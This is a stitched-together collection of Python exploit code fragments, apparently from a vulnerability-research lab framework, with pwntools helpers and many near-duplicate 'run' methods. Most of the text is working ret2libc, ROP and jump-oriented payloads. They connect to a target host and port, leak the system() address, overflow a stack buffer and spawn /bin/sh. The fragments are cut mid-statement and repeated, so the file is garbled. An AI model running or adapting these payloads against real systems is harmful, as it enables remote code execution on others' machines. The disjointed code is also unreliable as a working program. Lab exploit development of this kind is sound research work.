path = libcdb.search_by_build_id(build_id)
if path:
with context.local(log_level='error'):
e = ELF(path)
e.address = dynlib.libbase
result = e.symbols[symb]
if not result:
self.status("Trying remote lookup")
result = dynlib._lookup(symb)
else:
result = dynlib.libbase
#
# Did we win?
#
if result: self.success("%#x" % result)
else: self.failure("Could not find %s" % pretty)
return result
def __init__(self, filename, func='main'): elf = ELF(filename) addr = elf.sym[func] self.cfg = CFG(elf, addr) self.paths = [SymState(self.cfg, elf)]
def run(self):
if self.options['architecture'] == 'amd64':
if self.options['static'] == 'False':
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
# s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#s.connect((self.options['dIP'], int(self.options['port'])))
p = remote(self.options['dIP'], int(self.options['port']))
#p = process('../../vulnerabilities/coop/coop')
a = raw_input('input: ')
#set /bin/sh ASCII
binsh = p32(0x6e69622f) + p32(0x0068732f) + p32(0x74697865) + p32(0x63003020) + p32(0x6e6f6e61) + p32(0x6c616369)
#set payload
temppayload = "b"*2
#s.send(temppayload)
p.sendline(temppayload)
payload = binsh + p64(self.property['courseMLoopVptr']) + p64(self.property['studentsptr']) + p64(self.property['nstudent']) + p64(self.property['studentptr0']) + p64(self.property['studentptr1']) + p64(self.property['studentptr3']) + p64(self.property['studentptr2']) + p64(self.property['coursePrintfSystemVptr']) + p64(self.property['studentReadString']) + p64(self.property['examSumScore']) + p64(self.property['scoreA']) + p64(self.property['scoreB']) + p64(self.property['scoreC']) + p64(self.property['buibuttonClicked']) + p64(self.property['sysaddress'])
#s.send(payload)
p.sendline(payload)
#get new sysaddress here
#recv_data = s.recv(16)
recv_data = p.recvline()
self.property['sysaddress'] = int(recv_data,16)
print "sysaddress = " + hex(self.property['sysaddress'])
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#get /bin/sh offset
binsh_addr_offset = next(libc.search('/bin/sh')) -libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)
#get /bin/sh address
binsh_addr = self.property['sysaddress'] + binsh_addr_offset
print "binsh_addr = " + hex(binsh_addr)
#set payload
payload = p64(self.property['examSumScore']) + p64(self.property['scoreA']) + p64(self.property['scoreB']) + p64(self.property['scoreC']) + p64(self.property['buibuttonClicked']) + p64(binsh_addr) + p64(self.property['sysaddress'])
#s.send(payload)
p.sendline(payload)
print 'interactive'
#s.close()
p.interactive()
else:
print 'static'
elif self.options['architecture'] == 'i386':
if self.options['static'] == 'False':
print 'dl'
else:
print 'static'
else:
print 'Unrecognized architecture, stop.'
return
def from_blob(blob, *a, **kw):
return ROP(ELF.from_bytes(blob, *a, **kw))
dst, src = op.operands
op_1 = state.read_value(dst)
op_2 = state.read_value(src)
if isinstance(op_1, Immediate) and isinstance(op_2, Immediate):
val = Immediate(op_1.value & op_2.value)
else:
val = Unknown()
new_state.store_value(dst, val)
return new_state
if __name__ == '__main__':
import sys
if len(sys.argv) != 2:
print('Usage: {} <file>'.format(sys.argv[0]))
sys.exit()
e = ELF(sys.argv[1])
main_addr = e.symbols['main']
cfg = CFG(e, main_addr)
start = MachineState()
start.regs[X86_REG_RSP] = StackPointer(0)
vars = ConstantAnalysis(cfg, entry_state=start)
for op_addr in sorted(cfg.ops):
op = cfg.ops[op_addr]
print('{:120s} -- {}'.format(vars.before_states[op], op_str(op)))
def run(self):
if self.options['static'] == 'False':
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
#get new sysaddress here
s.send("a") #any string
recv_data = s.recv(16)
self.property['sysaddress'] = int(recv_data,16)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#get /bin/sh offset
print "sysaddress = " + hex(self.property['sysaddress'])
binsh_addr_offset = next(libc.search('/bin/sh')) -libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)
#get ret offset
pop_ret_offset = self.property['ret'] - libc.symbols['system']
print "pop_ret_offset = " + hex(pop_ret_offset)
#get /bin/sh address
binsh_addr = self.property['sysaddress'] + binsh_addr_offset
#get ret address
pop_ret_addr = self.property['sysaddress'] + pop_ret_offset
payload = "a"*self.property['offset'] + p64(pop_ret_addr) + p64(binsh_addr) + p64(self.property['sysaddress'])
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
#p.interactive()
else:
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
self.property = {'ret':0x0000000000401696, #gadget address in exe
'offset':24, #offset
'sysaddress':0x0} # system function address, initialize 0
self.vulnerability= 'vulnerabilities/stack_overflow/ggteststatic'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic')
self.property['sysaddress'] = libc.symbols['system']
print "sysaddress = " + hex(self.property['sysaddress'])
#get /bin/sh address
binsh_addr = next(libc.search('/bin/sh'))
#get ret address
pop_ret_addr = self.property['ret']
payload = "a"*self.property['offset'] + p64(pop_ret_addr) + p64(binsh_addr) + p64(self.property['sysaddress'])
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
if page_prefix == bytes('\x7fELF', 'utf8'):
logging.info(
"epp base address: 0x{:X}".format(epp_ba))
break
epp_ba -= 0x1000
def leak(address):
return a_read(s, address, 8)
epp_dyn_elf = DynELF(leak, epp_ba)
libc_mprotect = epp_dyn_elf.lookup('mprotect', 'libc')
context.clear(arch='amd64')
binary = ELF(epp_path)
binary.address = epp_ba
binary.symbols = {'mprotect': libc_mprotect}
rop = ROP(binary)
# Mark the current stack page, and the one just before, incase we are on a boundary.
rop.call(
'mprotect', (stack_frame.previous_frame_stack_base_pointer & ~0xFFF, 0x2000, 0x7))
target_ip = socket.gethostbyname(socket.gethostname())
mprotect_rop = rop.chain()
logging.info(rop.dump())
# We are gonna be a little lazy and just end with an infinite loop,
# we make no attempt to clean up the stack and continue normal
# execution.
def run(self):
if self.options['static'] == 'False':
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
#get new sysaddress here
s.send("a") #any string
recv_data = s.recv(16)
self.property['sysaddress'] = int(recv_data, 16)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#get /bin/sh offset
print "sysaddress = " + hex(self.property['sysaddress'])
binsh_addr_offset = next(
libc.search('/bin/sh')) - libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)
#get ret offset
pop_ret_offset = self.property['ret'] - libc.symbols['system']
print "pop_ret_offset = " + hex(pop_ret_offset)
#get /bin/sh address
binsh_addr = self.property['sysaddress'] + binsh_addr_offset
#get ret address
pop_ret_addr = self.property['sysaddress'] + pop_ret_offset
payload = "a" * self.property['offset'] + p64(pop_ret_addr) + p64(
binsh_addr) + p64(self.property['sysaddress'])
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
#p.interactive()
else:
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
self.property = {
'ret': 0x0000000000401696, #gadget address in exe
'offset': 24, #offset
'sysaddress': 0x0
} # system function address, initialize 0
self.vulnerability = 'vulnerabilities/stack_overflow/ggteststatic'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic')
self.property['sysaddress'] = libc.symbols['system']
print "sysaddress = " + hex(self.property['sysaddress'])
#get /bin/sh address
binsh_addr = next(libc.search('/bin/sh'))
#get ret address
pop_ret_addr = self.property['ret']
payload = "a" * self.property['offset'] + p64(pop_ret_addr) + p64(
binsh_addr) + p64(self.property['sysaddress'])
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
def run(self):
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
if self.options['architecture'] == 'amd64':
if self.options['static'] == 'False':
self.property = {'ret1': 0x0000000000021102, # gadget address in libc
'ret2': 0x000000000008ae95,
'ret3': 0x000000000003a718,
'ret4': 0x0000000000114809,
'ret5': 0x00000000000bb945,
'data1': 0x000000000000003b, # execv systemcall number
'data2': 0x0000000000000000,
'data3': 0x0000000000000000,
'offset': 40, # offset
'sysaddress': 0x0} # system function address, initialize 0
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
# get new sysaddress here
s.send("a") # any string
recv_data = s.recv(16)
self.property['sysaddress'] = int(recv_data, 16)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
print "sysaddress = " + hex(self.property['sysaddress'])
# get /bin/sh offset
binsh_addr_offset = next(libc.search('/bin/sh')) - libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)
# get ret offset
pop_ret1_offset = self.property['ret1'] - libc.symbols['system']
pop_ret2_offset = self.property['ret2'] - libc.symbols['system']
pop_ret3_offset = self.property['ret3'] - libc.symbols['system']
pop_ret4_offset = self.property['ret4'] - libc.symbols['system']
pop_ret5_offset = self.property['ret5'] - libc.symbols['system']
# get /bin/sh address
binsh_addr = self.property['sysaddress'] + binsh_addr_offset
# get ret address
pop_ret1_addr = self.property['sysaddress'] + pop_ret1_offset
pop_ret2_addr = self.property['sysaddress'] + pop_ret2_offset
pop_ret3_addr = self.property['sysaddress'] + pop_ret3_offset
pop_ret4_addr = self.property['sysaddress'] + pop_ret4_offset
pop_ret5_addr = self.property['sysaddress'] + pop_ret5_offset
# pop_ret5_addr =pop_ret4_addr - 2
# set payload
payload = "a" * self.property['offset'] + p64(pop_ret1_addr) + p64(binsh_addr) + p64(
pop_ret2_addr) + p64(pop_ret3_addr) + p64(self.property['data1']) + p64(pop_ret4_addr) + p64(
self.property['data2']) + p64(self.property['data3']) + p64(pop_ret5_addr)
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
else:
self.property = {'ret1': 0x0000000000401696, # gadget address in libc
'ret2': 0x00000000004264af,
'ret3': 0x00000000004c26e8,
'ret4': 0x0000000000442fe9,
'ret5': 0x0000000000467685,
'data1': 0x000000000000003b, # execv systemcall number
'data2': 0x0000000000000000,
'data3': 0x0000000000000000,
'offset': 24, # offset
'sysaddress': 0x0} # system function address, initialize 0
self.vulnerability = 'vulnerabilities/stack_overflow/ggteststatic'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic')
# get sysaddress here
self.property['sysaddress'] = libc.symbols['system']
print "sysaddress = " + hex(self.property['sysaddress'])
# get /bin/sh address
binsh_addr = next(libc.search('/bin/sh'))
# get ret address
pop_ret1_addr = self.property['ret1']
pop_ret2_addr = self.property['ret2']
pop_ret3_addr = self.property['ret3']
pop_ret4_addr = self.property['ret4']
pop_ret5_addr = self.property['ret5']
# set payload
payload = "a" * self.property['offset'] + p64(pop_ret1_addr) + p64(binsh_addr) + p64(
pop_ret2_addr) + p64(pop_ret3_addr) + p64(self.property['data1']) + p64(pop_ret4_addr) + p64(
self.property['data2']) + p64(self.property['data3']) + p64(pop_ret5_addr)
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
elif self.options['architecture'] == 'i386':
if self.options['static'] == 'False':
self.property = {'ret1': 0x00018395, # gadget address in libc : pop ebx ; ret
'ret2': 0x0002c5dc, # : xor eax, eax ; ret
'ret3': 0x00023f97, # : pop eax ; ret
'ret4': 0x0002baab, # : pop ecx ; pop edx ; ret
'ret5': 0x00002c87, # : int 0x80
'data1': 0x0000000b, # execv systemcall number
'data2': 0x00000000,
'data3': 0x00000000,
'offset': 26, # offset
'sysaddress': 0x0} # system function address, initialize 0
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
# get new sysaddress here
s.send("a") # any string
recv_data = s.recv(8)
self.property['sysaddress'] = int(recv_data, 16)
libc = ELF('/lib32/libc.so.6')
print "sysaddress = " + hex(self.property['sysaddress'])
# get /bin/sh offset
binsh_addr_offset = next(libc.search('/bin/sh')) - libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)
# get ret offset
pop_ret1_offset = self.property['ret1'] - libc.symbols['system']
pop_ret2_offset = self.property['ret2'] - libc.symbols['system']
pop_ret3_offset = self.property['ret3'] - libc.symbols['system']
pop_ret4_offset = self.property['ret4'] - libc.symbols['system']
pop_ret5_offset = self.property['ret5'] - libc.symbols['system']
# get /bin/sh address
binsh_addr = self.property['sysaddress'] + binsh_addr_offset
# get ret address
pop_ret1_addr = self.property['sysaddress'] + pop_ret1_offset
pop_ret2_addr = self.property['sysaddress'] + pop_ret2_offset
pop_ret3_addr = self.property['sysaddress'] + pop_ret3_offset
pop_ret4_addr = self.property['sysaddress'] + pop_ret4_offset
pop_ret5_addr = self.property['sysaddress'] + pop_ret5_offset
# pop_ret5_addr =pop_ret4_addr - 2
# set payload
payload = "a" * self.property['offset'] + p32(pop_ret1_addr) + p32(binsh_addr) + p32(
pop_ret2_addr) + p32(pop_ret3_addr) + p32(self.property['data1']) + p32(pop_ret4_addr) + p32(
self.property['data2']) + p32(self.property['data3']) + p32(pop_ret5_addr)
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
else:
print "Not supported: i386 & static."
else:
print 'Unrecognized architecture, stop.'
return
def run(self):
if self.options['architecture'] == 'amd64':
if self.options['static'] == 'False':
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
p = remote(self.options['dIP'], int(self.options['port']))
#a = raw_input('input: ')
#set /bin/sh ASCII
binsh = p32(0x6e69622f) + p32(0x0068732f)
#set payload
payload = 'a'*(self.property['offset']-8) + binsh + p32(self.property['limit']) + p32(self.property['choose']) + p64(self.property['p']) + p64(self.property['q'])
#send payload
p.sendline(payload)
#recv
recv_data = p.recv()
print 'rev1: ' + recv_data
#set payload
payload = 'a'*(self.property['offset']-8) + binsh + p32(self.property['limit']) + p32(self.property['choose'])
#send payload
p.sendline(payload)
#recv get new sysaddress here
recv_data = p.recvline()
print 'rev2: ' + recv_data
self.property['sysaddress'] = int(recv_data,16)
print "sysaddress = " + hex(self.property['sysaddress'])
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#get /bin/sh offset
binsh_addr_offset = next(libc.search('/bin/sh')) -libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)
#get /bin/sh address
binsh_addr = self.property['sysaddress'] + binsh_addr_offset
print "binsh_addr = " + hex(binsh_addr)
#set payload
self.property['choose'] = 2
self.property['p'] = 0x601098
self.property['q'] = 0x7fffffffdc78
payload = 'a'*(self.property['offset']-8)+ p64(self.property['sysaddress']) + p32(self.property['limit']) + p32(self.property['choose']) + p64(self.property['p']) + p64(self.property['q'])
#send payload
p.sendline(payload)
#recv
recv_data = p.recvline()
print 'rev3: ' + recv_data
#set payload
self.property['choose'] = 2
self.property['p'] = 0x60109c
self.property['q'] = 0x7fffffffdc7c
payload = 'a'*(self.property['offset']-8)+ p64(self.property['sysaddress']) + p32(self.property['limit']) + p32(self.property['choose']) + p64(self.property['p']) + p64(self.property['q'])
#send payload
p.sendline(payload)
#recv
recv_data = p.recvline()
print 'rev4: ' + recv_data
#set payload
self.property['limit'] = 0
self.property['choose'] = 3
self.property['p'] = 0x601070
self.property['q'] = 0x601078
payload = binsh + 'a'*(self.property['offset']-8) + p32(self.property['limit']) + p32(self.property['choose']) + p64(self.property['p']) + p64(self.property['q'])
#send payload
p.sendline(payload)
print 'interactive'
p.interactive()
else:
print 'static'
elif self.options['architecture'] == 'i386':
if self.options['static'] == 'False':
print 'dl'
else:
print 'static'
else:
print 'Unrecognized architecture, stop.'
return
def run(self):
if self.options['static'] == 'False':
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
#get new sysaddress here
s.send('a')
recv_data = s.recv(16)
self.property['sysaddress'] = int(recv_data,16)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
print "sysaddress = " + hex(self.property['sysaddress'])
#get rbp
s.send('b')
recv_data1 = s.recv(16)
self.property['gadgetaddr'] = int(recv_data1,16)
print "gadgetaddr = " + hex(self.property['gadgetaddr'])
gadgetaddr=self.property['gadgetaddr'] + 72
#get /bin/sh offset
binsh_addr_offset = next(libc.search('/bin/sh')) -libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)
#get jmp offset
pop_jmp1_offset = self.property['jmp1'] - libc.symbols['system']
pop_jmp2_offset = self.property['jmp2'] - libc.symbols['system']
pop_jmp3_offset = self.property['jmp3'] - libc.symbols['system']
pop_jmp4_offset = self.property['jmp4'] - libc.symbols['system']
pop_jmp5_offset = self.property['jmp5'] - libc.symbols['system']
pop_jmp6_offset = self.property['jmp6'] - libc.symbols['system']
print "pop_jmp1_offset = " + hex(pop_jmp1_offset)
#get /bin/sh address
binsh_addr = self.property['sysaddress'] + binsh_addr_offset
#get jmp address
pop_jmp1_addr = self.property['sysaddress'] + pop_jmp1_offset
pop_jmp2_addr = self.property['sysaddress'] + pop_jmp2_offset
pop_jmp3_addr = self.property['sysaddress'] + pop_jmp3_offset
pop_jmp4_addr = self.property['sysaddress'] + pop_jmp4_offset
pop_jmp5_addr = self.property['sysaddress'] + pop_jmp5_offset
pop_jmp52_addr = self.property['sysaddress'] + pop_jmp5_offset
pop_jmp6_addr = self.property['sysaddress'] + pop_jmp6_offset
print "pop_jmp1_addr = " + hex(pop_jmp1_addr)
#set payload
payload = "a"*self.property['offset'] + p64(self.property['ret']) + p64(self.property['dispatcherAddr']) + p64(self.property['dispatcherAddr']) + p64(gadgetaddr) + p64(binsh_addr) + p64(self.property['data1']) + p64(self.property['data1']) + p64(self.property['data1']) + p64(self.property['data2']) + p64(pop_jmp1_addr) + p64(pop_jmp2_addr) + p64(pop_jmp3_addr) + p64(pop_jmp4_addr) + p64(pop_jmp5_addr) + p64(pop_jmp52_addr) + p64(pop_jmp6_addr)
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
else:
self.property = {'ret':0x00000000004009d9, #initialize register address
'dispatcherAddr':0x00000000004009dc,# dispatcher gadget address
'gadgetaddr':0x0,#the address of first gadget address in stack, initialize 0
'data1':0x0000000000000000,
'data2':0x000000000000003b,#execv systemcall number
'jmp1':0x00000000004738cd,#functional gadget address in libc
'jmp2':0x000000000047e7a0,
'jmp3':0x0000000000441cb2,
'jmp4':0x0000000000441cb2,
'jmp5':0x00000000004009e2,
'jmp6':0x0000000000467685,
'offset':24, # offset
'sysaddress':0x0} # system function address, initialize 0
self.vulnerability= 'vulnerabilities/stack_overflow/ggteststatic'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic')
#get sysaddress here
self.property['sysaddress'] = libc.symbols['system']
print "sysaddress = " + hex(self.property['sysaddress'])
#get rbp
s.send('b')
recv_data1 = s.recv(16)
self.property['gadgetaddr'] = int(recv_data1,16)
print "gadgetaddr = " + hex(self.property['gadgetaddr'])
gadgetaddr=self.property['gadgetaddr'] + 64
#get /bin/sh address
binsh_addr = next(libc.search('/bin/sh'))
#get jmp offset
pop_jmp1_addr = self.property['jmp1']
pop_jmp2_addr = self.property['jmp2']
pop_jmp3_addr = self.property['jmp3']
pop_jmp4_addr = self.property['jmp4']
pop_jmp5_addr = self.property['jmp5']
pop_jmp6_addr = self.property['jmp6']
#set payload
payload = "a"*self.property['offset'] + p64(self.property['ret']) + p64(self.property['dispatcherAddr']) + p64(self.property['dispatcherAddr']) + p64(gadgetaddr) + p64(self.property['data1']) + p64(self.property['data1']) + p64(binsh_addr) + p64(self.property['data2']) + p64(pop_jmp1_addr) + p64(pop_jmp2_addr) + p64(pop_jmp3_addr) + p64(pop_jmp4_addr) + p64(pop_jmp5_addr) + p64(pop_jmp6_addr)
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
result = True
break
if "Closed" in data:
sys.stdout.write("Terminated\n")
sys.stdout.flush()
break
sock.close()
return result
if __name__ == "__main__":
Host = os.getenv("HOST", "localhost")
Port = int(os.getenv("PORT", 31340))
Ticket = os.getenv("TICKET", "")
File = os.getenv("DIR", "/data") + os.sep + "test.elf"
f = ELF(File)
cookie = f.read(f.symbols['COOKIE'], 4)
crc8 = crcmod.mkCrcFun(0x107, rev=False, initCrc=0x0, xorOut=0x00)
solve(cookie)
'''
Success = 0
Trials = 5000
for ii in range(0,Trials):
if solve():
Success += 1
if ii % 25 == 24:
print("%d/%d" % (Success, ii+1))
print("%d/%d" % (Success, Trials))
'''
def run(self):
if self.options['static'] == 'False':
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
#get new sysaddress here
s.send('a')
recv_data = s.recv(16)
self.property['sysaddress'] = int(recv_data, 16)
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
print "sysaddress = " + hex(self.property['sysaddress'])
#get rbp
s.send('b')
recv_data1 = s.recv(16)
self.property['gadgetaddr'] = int(recv_data1, 16)
print "gadgetaddr = " + hex(self.property['gadgetaddr'])
gadgetaddr = self.property['gadgetaddr'] + 72
#get /bin/sh offset
binsh_addr_offset = next(
libc.search('/bin/sh')) - libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)
#get jmp offset
pop_jmp1_offset = self.property['jmp1'] - libc.symbols['system']
pop_jmp2_offset = self.property['jmp2'] - libc.symbols['system']
pop_jmp3_offset = self.property['jmp3'] - libc.symbols['system']
pop_jmp4_offset = self.property['jmp4'] - libc.symbols['system']
pop_jmp5_offset = self.property['jmp5'] - libc.symbols['system']
pop_jmp6_offset = self.property['jmp6'] - libc.symbols['system']
print "pop_jmp1_offset = " + hex(pop_jmp1_offset)
#get /bin/sh address
binsh_addr = self.property['sysaddress'] + binsh_addr_offset
#get jmp address
pop_jmp1_addr = self.property['sysaddress'] + pop_jmp1_offset
pop_jmp2_addr = self.property['sysaddress'] + pop_jmp2_offset
pop_jmp3_addr = self.property['sysaddress'] + pop_jmp3_offset
pop_jmp4_addr = self.property['sysaddress'] + pop_jmp4_offset
pop_jmp5_addr = self.property['sysaddress'] + pop_jmp5_offset
pop_jmp52_addr = self.property['sysaddress'] + pop_jmp5_offset
pop_jmp6_addr = self.property['sysaddress'] + pop_jmp6_offset
print "pop_jmp1_addr = " + hex(pop_jmp1_addr)
#set payload
payload = "a" * self.property['offset'] + p64(
self.property['ret']
) + p64(self.property['dispatcherAddr']) + p64(
self.property['dispatcherAddr']
) + p64(gadgetaddr) + p64(binsh_addr) + p64(
self.property['data1']) + p64(self.property['data1']) + p64(
self.property['data1']) + p64(
self.property['data2']) + p64(pop_jmp1_addr) + p64(
pop_jmp2_addr) + p64(pop_jmp3_addr) + p64(
pop_jmp4_addr) + p64(pop_jmp5_addr) + p64(
pop_jmp52_addr) + p64(pop_jmp6_addr)
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
else:
self.property = {
'ret': 0x00000000004009d9, #initialize register address
'dispatcherAddr':
0x00000000004009dc, # dispatcher gadget address
'gadgetaddr':
0x0, #the address of first gadget address in stack, initialize 0
'data1': 0x0000000000000000,
'data2': 0x000000000000003b, #execv systemcall number
'jmp1': 0x00000000004738cd, #functional gadget address in libc
'jmp2': 0x000000000047e7a0,
'jmp3': 0x0000000000441cb2,
'jmp4': 0x0000000000441cb2,
'jmp5': 0x00000000004009e2,
'jmp6': 0x0000000000467685,
'offset': 24, # offset
'sysaddress': 0x0
} # system function address, initialize 0
self.vulnerability = 'vulnerabilities/stack_overflow/ggteststatic'
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
libc = ELF('../../vulnerabilities/stack_overflow/ggteststatic')
#get sysaddress here
self.property['sysaddress'] = libc.symbols['system']
print "sysaddress = " + hex(self.property['sysaddress'])
#get rbp
s.send('b')
recv_data1 = s.recv(16)
self.property['gadgetaddr'] = int(recv_data1, 16)
print "gadgetaddr = " + hex(self.property['gadgetaddr'])
gadgetaddr = self.property['gadgetaddr'] + 64
#get /bin/sh address
binsh_addr = next(libc.search('/bin/sh'))
#get jmp offset
pop_jmp1_addr = self.property['jmp1']
pop_jmp2_addr = self.property['jmp2']
pop_jmp3_addr = self.property['jmp3']
pop_jmp4_addr = self.property['jmp4']
pop_jmp5_addr = self.property['jmp5']
pop_jmp6_addr = self.property['jmp6']
#set payload
payload = "a" * self.property['offset'] + p64(
self.property['ret']
) + p64(self.property['dispatcherAddr']) + p64(
self.property['dispatcherAddr']) + p64(gadgetaddr) + p64(
self.property['data1']) + p64(
self.property['data1']) + p64(binsh_addr) + p64(
self.property['data2']) + p64(pop_jmp1_addr) + p64(
pop_jmp2_addr) + p64(pop_jmp3_addr) + p64(
pop_jmp4_addr) + p64(pop_jmp5_addr) + p64(
pop_jmp6_addr)
print "\n##########sending payload##########\n"
s.send(payload)
s.close()
def lookup(self, symb=None, lib=None):
"""lookup(symb = None, lib = None) -> int
Find the address of ``symbol``, which is found in ``lib``.
Arguments:
symb(str): Named routine to look up
If omitted, the base address of the library will be returned.
lib(str): Substring to match for the library name.
If omitted, the current library is searched.
If set to ``'libc'``, ``'libc.so'`` is assumed.
Returns:
Address of the named symbol, or :const:`None`.
"""
result = None
if lib == 'libc':
lib = 'libc.so'
#
# Get a pretty name for the symbol to show the user
#
if symb and lib:
pretty = '%r in %r' % (symb, lib)
else:
pretty = repr(symb or lib)
if not pretty:
self.failure("Must specify a library or symbol")
self.waitfor('Resolving %s' % pretty)
#
# If we are loading from a different library, create
# a DynELF instance for it.
#
if lib is not None: dynlib = self._dynamic_load_dynelf(lib)
else: dynlib = self
if dynlib is None:
log.failure("Could not find %r" % lib)
return None
#
# If we are resolving a symbol in the library, find it.
#
if symb and self.libcdb:
# Try a quick lookup by build ID
self.status("Trying lookup based on Build ID")
build_id = dynlib._lookup_build_id(lib=lib)
if build_id:
log.info("Trying lookup based on Build ID: %s" % build_id)
path = libcdb.search_by_build_id(build_id)
if path:
with context.local(log_level='error'):
e = ELF(path)
e.address = dynlib.libbase
result = e.symbols[symb]
if symb and not result:
self.status("Trying remote lookup")
result = dynlib._lookup(symb)
if not symb:
result = dynlib.libbase
#
# Did we win?
#
if result: self.success("%#x" % result)
else: self.failure("Could not find %s" % pretty)
return result
def run(self):
if self.options['architecture'] == 'amd64':
if self.options['static'] == 'False':
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
p = remote(self.options['dIP'], int(self.options['port']))
#a = raw_input('input: ')
#set /bin/sh ASCII
binsh = p32(0x6e69622f) + p32(0x0068732f)
#set payload
payload = 'a' * (self.property['offset'] - 8) + binsh + p32(
self.property['limit']) + p32(
self.property['choose']) + p64(
self.property['p']) + p64(self.property['q'])
#send payload
p.sendline(payload)
#recv
recv_data = p.recv()
print 'rev1: ' + recv_data
#set payload
payload = 'a' * (self.property['offset'] - 8) + binsh + p32(
self.property['limit']) + p32(self.property['choose'])
#send payload
p.sendline(payload)
#recv get new sysaddress here
recv_data = p.recvline()
print 'rev2: ' + recv_data
self.property['sysaddress'] = int(recv_data, 16)
print "sysaddress = " + hex(self.property['sysaddress'])
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#get /bin/sh offset
binsh_addr_offset = next(
libc.search('/bin/sh')) - libc.symbols['system']
print "binsh_addr_offset = " + hex(binsh_addr_offset)
#get /bin/sh address
binsh_addr = self.property['sysaddress'] + binsh_addr_offset
print "binsh_addr = " + hex(binsh_addr)
#set payload
self.property['choose'] = 2
self.property['p'] = 0x601098
self.property['q'] = 0x7fffffffdc78
payload = 'a' * (self.property['offset'] - 8) + p64(
self.property['sysaddress']) + p32(
self.property['limit']) + p32(
self.property['choose']) + p64(
self.property['p']) + p64(self.property['q'])
#send payload
p.sendline(payload)
#recv
recv_data = p.recvline()
print 'rev3: ' + recv_data
#set payload
self.property['choose'] = 2
self.property['p'] = 0x60109c
self.property['q'] = 0x7fffffffdc7c
payload = 'a' * (self.property['offset'] - 8) + p64(
self.property['sysaddress']) + p32(
self.property['limit']) + p32(
self.property['choose']) + p64(
self.property['p']) + p64(self.property['q'])
#send payload
p.sendline(payload)
#recv
recv_data = p.recvline()
print 'rev4: ' + recv_data
#set payload
self.property['limit'] = 0
self.property['choose'] = 3
self.property['p'] = 0x601070
self.property['q'] = 0x601078
payload = binsh + 'a' * (self.property['offset'] - 8) + p32(
self.property['limit']) + p32(
self.property['choose']) + p64(
self.property['p']) + p64(self.property['q'])
#send payload
p.sendline(payload)
print 'interactive'
p.interactive()
else:
print 'static'
elif self.options['architecture'] == 'i386':
if self.options['static'] == 'False':
print 'dl'
else:
print 'static'
else:
print 'Unrecognized architecture, stop.'
return
def from_blob(blob, *a, **kw):
return ROP(ELF.from_bytes(blob, *a, **kw))
def run(self):
if self.options['static'] == 'False':
'''Run your exploit here, if this script could success, the VRL can run it.
When the exploit run, follow the options.'''
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((self.options['dIP'], int(self.options['port'])))
#get new sysaddress here
s.send("a") #any string
recv_data = s.recv(8)
self.property['sysaddress'] = int(recv_data, 16)
libc = ELF('/lib32/libc.so.6')
print "sysaddress = " + hex(self.property['sysaddress'])
#get /bin/sh offset
binsh_addr_offset = next(
